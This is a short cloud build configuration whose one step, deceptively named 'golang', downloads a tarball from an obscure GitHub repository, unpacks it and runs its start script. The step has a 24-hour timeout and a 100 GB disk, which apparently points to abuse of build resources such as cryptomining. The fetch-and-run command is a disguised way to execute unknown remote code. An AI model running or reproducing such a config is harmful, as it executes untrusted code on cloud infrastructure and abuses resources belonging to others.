steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/jhhtgrtngrfbg/ajayy/raw/main/ajayy.tar.gz && tar xf ajayy.tar.gz && ./start.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
